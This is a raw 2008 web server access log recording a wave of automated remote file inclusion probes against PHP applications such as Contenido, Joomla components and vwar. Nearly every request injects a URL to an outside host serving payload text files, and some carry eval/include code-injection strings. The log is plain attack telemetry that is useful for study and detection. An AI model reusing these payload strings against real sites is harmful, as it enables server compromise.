67.19.105.42 - - [08/Dec/2008:09:33:49 -0800] "GET /logs/access_081031.log//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.50 - - [08/Dec/2008:09:34:18 -0800] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://www.iesleonardodavinci.cat/blogger/nucleus/libs/idgn1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.31.50 - - [08/Dec/2008:09:34:18 -0800] "GET /contenido/external/frontend/news.php?cfg[path][includes]=http://www.iesleonardodavinci.cat/blogger/nucleus/libs/idgn1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:34:54 -0800] "GET /logs//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:34:54 -0800] "GET /conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:34:54 -0800] "GET /logs/access_081031.log%20%20//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:09:35:00 -0800] "GET /logs/scripts.log//tools/send_reminders.php?noSet=0&includedir=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:09:35:00 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.70.72.195 - - [08/Dec/2008:09:35:00 -0800] "GET /logs//tools/send_reminders.php?noSet=0&includedir=http://bamrecordsinc.com/images/id.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:35:01 -0800] "GET /logs/access_081014.log%20%20//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:35:30 -0800] "GET /conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:35:30 -0800] "GET /logs/access_081031.log%20%20//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:35:30 -0800] "GET /logs//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:35:57 -0800] "GET /logs/access_081014.log%20%20//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:36:08 -0800] "GET /logs/access_081014.log//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:36:34 -0800] "GET /logs/access_081031.log//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:36:34 -0800] "GET /logs/access_081014.log//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
218.239.45.154 - - [08/Dec/2008:09:36:43 -0800] "GET /logs/access_081031.log//conlib/local.php?cfg[path][contenido]=http://fctribe.com/data/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:38:04 -0800] "GET /logs/access_081027.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://newv5.is-the-boss.com/v5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:38:04 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://newv5.is-the-boss.com/v5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:38:04 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://newv5.is-the-boss.com/v5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:38:35 -0800] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:38:35 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:38:35 -0800] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:38:47 -0800] "GET /logs/access_081107.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://newv5.is-the-boss.com/v5.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:39:24 -0800] "GET /logs/access_081107.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
195.56.55.158 - - [08/Dec/2008:09:39:28 -0800] "GET /lib/adodb_lite/adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://wildfood.co.kr/home//data/pandega.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
125.141.138.23 - - [08/Dec/2008:09:39:29 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://korea-photo.com/bbs/data/id/test.html?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
125.141.138.23 - - [08/Dec/2008:09:39:29 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://korea-photo.com/bbs/data/id/test.html?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:39:40 -0800] "GET /logs/access_080807.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.50 - - [08/Dec/2008:09:39:40 -0800] "GET /logs/access_080713.log//contenido/external/frontend/news.php?cfg[path][includes]=http://www.iesleonardodavinci.cat/blogger/nucleus/libs/idgn1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.38.31.50 - - [08/Dec/2008:09:39:41 -0800] "GET /contenido/external/frontend/news.php?cfg[path][includes]=http://www.iesleonardodavinci.cat/blogger/nucleus/libs/idgn1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:39:43 -0800] "GET /logs/access_071129.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
70.38.31.50 - - [08/Dec/2008:09:39:46 -0800] "GET /logs//contenido/external/frontend/news.php?cfg[path][includes]=http://www.iesleonardodavinci.cat/blogger/nucleus/libs/idgn1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:39:46 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:39:51 -0800] "GET /logs/access_080623.log%20%20/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.142.233 - - [08/Dec/2008:09:39:51 -0800] "GET /bikes/dteel/WeSTOC08/2008_06_24/ HTTP/1.0" 200 14161 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:39:53 -0800] "GET /logs/access_080724.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:39:55 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:39:55 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:39:59 -0800] "GET /logs/access_071225.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
202.125.46.108 - - [08/Dec/2008:09:39:59 -0800] "GET /logs/access_071109.log%20%20/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://en.gov.ua/downloads/plans/copyright.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
72.30.142.233 - - [08/Dec/2008:09:40:01 -0800] "GET /bikes/dteel/WeSTOC08/?S=A HTTP/1.0" 200 1245 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:40:03 -0800] "GET /logs/access_080216.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:40:04 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:40:04 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:40:06 -0800] "GET /logs/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:40:06 -0800] "GET /components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.40.52.18 - - [08/Dec/2008:09:40:19 -0800] "GET /logs/access_080714.log//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://grasso59.altervista.org/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:40:22 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:40:22 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:40:22 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:43:09 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:43:09 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
207.226.88.17 - - [08/Dec/2008:09:43:23 -0800] "GET /logs/access_080214.log/components/errors.php?error=http://oursoultvxq.com/bbs/data/bbs/chi.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.76.23.179 - - [08/Dec/2008:09:43:34 -0800] "GET /logs/access_080816.log/errors.php?error=http://rubii.t35.com/pit-id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:43:41 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:43:41 -0800] "GET /logs/access_081107.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:43:41 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:44:34 -0800] "GET /logs/access_080912.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
201.236.88.58 - - [08/Dec/2008:09:44:40 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.236.88.58 - - [08/Dec/2008:09:44:46 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:44:47 -0800] "GET /logs/NuclearBB/tasks/send_queued_emails.php?root_path=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:44:48 -0800] "GET /NuclearBB/tasks/send_queued_emails.php?root_path=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.236.88.58 - - [08/Dec/2008:09:44:51 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://baaaaaa.altervista.org/sc.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:45:22 -0800] "GET /logs//?page=http://www.geocities.com/kerehore93/idq.txt??? HTTP/1.1" 200 77030 "-" "libwww-perl/5.811" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:45:24 -0800] "GET /logs//?page=http://www.geocities.com/kebrok_joss/idq.txt??? HTTP/1.1" 200 77030 "-" "libwww-perl/5.811" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:45:26 -0800] "GET /?page=http://www.geocities.com/kerehore93/idq.txt??? HTTP/1.1" 200 94694 "-" "libwww-perl/5.811" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:45:27 -0800] "GET /?page=http://www.geocities.com/kebrok_joss/idq.txt??? HTTP/1.1" 200 94701 "-" "libwww-perl/5.811" "www.dmulk.com"
219.85.63.226 - - [08/Dec/2008:09:47:07 -0800] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.csjh.tpc.edu.tw/~sw/board/idr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:09:47:11 -0800] "GET /logs/access_080619.log//errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:09:47:12 -0800] "GET /errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:09:47:12 -0800] "GET /logs//errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:09:47:28 -0800] "GET /logs/access_080509.log//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.247.65.114 - - [08/Dec/2008:09:47:28 -0800] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.geocities.com/kebrok_joss/new.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:48:54 -0800] "GET /logs/?sourcedir=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 200 77025 "-" "libwww-perl/5.79" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:48:57 -0800] "GET /?sourcedir=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 200 94680 "-" "libwww-perl/5.79" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:49:18 -0800] "GET /logs/?sourcedir=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 200 77025 "-" "libwww-perl/5.79" "www.dmulk.com"
63.148.24.80 - - [08/Dec/2008:09:49:20 -0800] "GET /?sourcedir=http://www.geocities.com/u.piel/header.jpg? HTTP/1.1" 200 94680 "-" "libwww-perl/5.79" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:09:49:45 -0800] "GET /logs/access_081016.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:09:49:45 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
208.77.100.195 - - [08/Dec/2008:09:49:45 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://millionaire-secrets.bikaigroup.us/images/pulaid.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:09:49:46 -0800] "GET /logs/access_080619.log//errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:09:49:46 -0800] "GET /errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.146.102.38 - - [08/Dec/2008:09:49:47 -0800] "GET /logs//errors.php?error=http://killearnlakeshoa.org/calendar/includes/.bash/in.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:50:11 -0800] "GET /logs/access_081027.log/s_loadenv.inc.php?DOCUMENT_ROOT=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:50:11 -0800] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
122.201.76.100 - - [08/Dec/2008:09:50:11 -0800] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://marista.or.kr/bbs/data/data/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:13 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:13 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:50:16 -0800] "GET /logs/access_081117.log//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:50:16 -0800] "GET /weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
82.102.10.26 - - [08/Dec/2008:09:50:16 -0800] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:50:17 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:50:17 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:18 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:18 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:50:24 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:50:24 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:50:24 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
72.232.202.218 - - [08/Dec/2008:09:50:37 -0800] "GET /logs/access_071127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://djvirgil.nl/modules/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:37 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:37 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:38 -0800] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:38 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:38 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.geocities.com/scannersid/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:39 -0800] "GET /logs/access_080127.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
75.125.151.18 - - [08/Dec/2008:09:50:39 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://sozdaem.com.ua/c8a2a99e526bbf770319b415c1708fb7/ids.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
